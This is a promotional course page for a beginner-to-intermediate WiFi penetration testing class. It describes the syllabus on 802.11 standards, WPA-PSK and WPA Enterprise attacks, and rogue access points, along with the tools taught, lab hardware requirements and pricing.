FinchSec logo

WiFi Exploitation 101

Description

Currently, this course is offered as an instructor-led 2-day online class. It is comprised of lectures, demonstrations, and 12 hands-on labs to help you master the different tools and techniques for proficiency in WiFi penetration testing and vulnerability assessment.

AWUS036ACM, and screenshots of Kismet, hostapd mana, alseap, hashcat, Wireshark

We will start with the IEEE 802.11 basics, about the standard and what each amendment brings to the table, as well as the channels and frequency bands, starting with the original 802.11 on the 2.4GHz ISM band, to the 802.11ax, that uses MIMO and operates on the 2.4, 5, and 6GHz bands, and also about 802.11be, aka WiFi 7, which will be finalized this year.

While these bands are license-free, we still have to abide by the ever changing regulations around the world, even during a penetration test, and you will learn how to ensure your system does.

You will also learn about the various network structures for WiFi networks, as well as the terminology, enabling you to understand the various tools we will be using.

Hardware matters significantly when doing a WiFi penetration test or a vulnerability assessment, as not every WiFi adapter work, is dependable, or has the capabilities required for this type of work. We will discuss recommended adapters and their capabilities, as well as how to select the right one for the job.

Equally important is the software used, including the OS and the drivers. Hardware is useless without quality software. We'll briefly go over the available Linux distributions for WiFi penetration testing, wireless drivers, and other considerations when choosing hardware and software.

From here, we'll move into learning about the different frames that are encountered on WiFi networks, including a brief exploration with Wireshark and a number of packet capture files, as well as live capture.

Afterward, we will cover the various choices of encryption (and in one case, the lack of) of Wi-Fi networks:

  • Open networks, with its lack of encryption
  • WEP
  • OWE, also known as Enhanced Open
  • WPA (1), WPA2, and WPA3

For WPA, we'll go over what differentiate WPA Personal (Pre-Shared Key or PSK) and WPA Enterprise. We'll learn the details about WPA 4-way handshake, which is used on both Personal and Enterprise networks, and practice different techniques to exploit WPA-PSK networks, including leveraging rogue access points.

Then, we'll cover WPA Enterprise and EAP, with the numerous methods and encapsulations available when authenticating. We'll focus on PEAP-MSCHAPv2, and go over the details of this 2-phases exchange itself. We'll see how it looks in a packet capture and cover attacking and exploiting this type of network set-up.

 

Who should take this course?

Anyone beginning a career in information security or network administration can benefit from this course. It is designed as a beginner to intermediate course and can also be useful to information security professionals looking to expand their skill set and/or learn WiFi penetration testing.

Overview

This class combines course materials with 12 hands-on labs for practice. The following topics are covered in the course:

  • IEEE 802.11 and the WiFi Alliance
  • Channels and frequencies
  • Regulatory Domain
  • Network structure, terminology, and modes
  • Encryption on Wi-Fi networks
  • OS, drivers, and Wi-Fi hardware
  • State machine and introduction to 802.11 frames
  • Penetration testing distributions
  • Wi-Fi adapter capabilities
  • Packet capture and injection
  • WPA and its handshakes
  • WPA-PSK and exploitation
  • Rogue Access Points
  • Wordlist generation
  • WPA Enterprise and exploitation

Major tools covered

  • Aircrack-ng suite
  • Kismet
  • Wireshark
  • hostapd-mana
  • asleap
  • John the ripper
  • Hashcat

What you'll get

  • A customized version of Kali Linux (x86-64) virtual machine, for the hands-on labs
  • Hands-on labs
  • Full access to the alumni-only section of our Discord Server

Hardware requirements

A recent computer with:

  • One free USB-A port
  • x86 64 bit CPU (Mac with M1, M2, or M3 CPUs are NOT supported at this time)
  • 8Gb+ RAM
  • 25Gb+ of free disk space
  • VMware Workstation v9.0+, or Player v5.0+, or Fusion 12.0+
  • Webcam for live classes
  • Headset for live classes (optional, but recommended)

For the live class, a webcam is also required. Headset is optional but recommended.

The hands-on labs require:

  • A spare access point
  • A wireless adapter capable of doing at least 802.11n, monitor mode, and AP mode on Kali Linux
  • Spare Wi-Fi client device: an Android, iOS, or an extra computer (separate from the one being used during this class)

Our recommendations

We recommend the following hardware for the successful completion of the hands-on labs:

For best experience in the labs, we recommend the latest version of VMware Workstation/Player (17.5) or Fusion (13.5), along with a USB 3.0 port.

While not mandatory, we also suggest students have a basic familiarity with networking, Linux, and the command line.

In addition to using the hands-on labs for practice, we strongly believe that taking notes is an integral part of the learning process. For that reason, we recommend all students attend class with a notebook and pen or pencil. If you do prefer to take notes digitally, we recommend tools like OneNote, Obsidian, or any other text application of your choice.

Dual monitors are preferable as they offer the opportunity to have the class on one monitor, and the labs or note-taking on the other monitor.

Course pricing

All prices are in U.S. dollars.

Online live class
Starting at $499
Self-paced
Get notified when available
 

Ready to start your journey?